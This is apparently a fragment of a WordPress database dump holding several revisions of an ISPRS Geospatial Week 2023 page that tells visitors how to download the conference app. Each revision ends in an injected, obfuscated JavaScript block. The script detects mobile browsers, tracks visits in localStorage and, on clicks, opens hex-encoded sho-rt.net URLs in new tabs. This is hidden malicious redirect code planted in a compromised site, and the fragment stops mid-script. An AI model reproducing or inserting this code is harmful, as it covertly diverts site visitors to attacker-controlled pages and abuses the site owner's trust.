_0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-08-26 21:30:34','2023-08-26 21:30:34','',5417,'https://gsw2023.com/?p=5423',0,'revision','',0),
(5424,1,'2023-08-26 21:34:34','2023-08-26 21:34:34','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\nhttps://conference4me.psnc.pl/download/\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','DOWNLOAD THE GSW2023 APP','','inherit','closed','closed','','5417-revision-v1','','','2023-08-26 21:34:34','2023-08-26 21:34:34','',5417,'https://gsw2023.com/?p=5424',0,'revision','',0),
(5425,1,'2023-08-26 21:41:56','2023-08-26 21:41:56','<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>You may now download the conf4me app and check the conference agenda, hotels, and speakers and stay in touch with important news.\r\n\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\"><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>﻿</span>https://conference4me.psnc.pl/download/\r\n\r\n\r\nAfter downloading the app, select ISPRS Geospatial Week 2023\r\n\r\n<img src=\"https://gsw2023.com/wp-content/uploads/2023/08/QR-code-nposter2_Siavash_14May19-726x1024-1.jpg\" alt=\"\" width=\"365\" height=\"512\" class=\"alignnone size-full wp-image-5420\" />\r\n<span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span><span data-mce-type=\"bookmark\" style=\"display: inline-block; width: 0px; overflow: hidden; line-height: 0;\" class=\"mce_SELRES_start\">﻿</span>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera 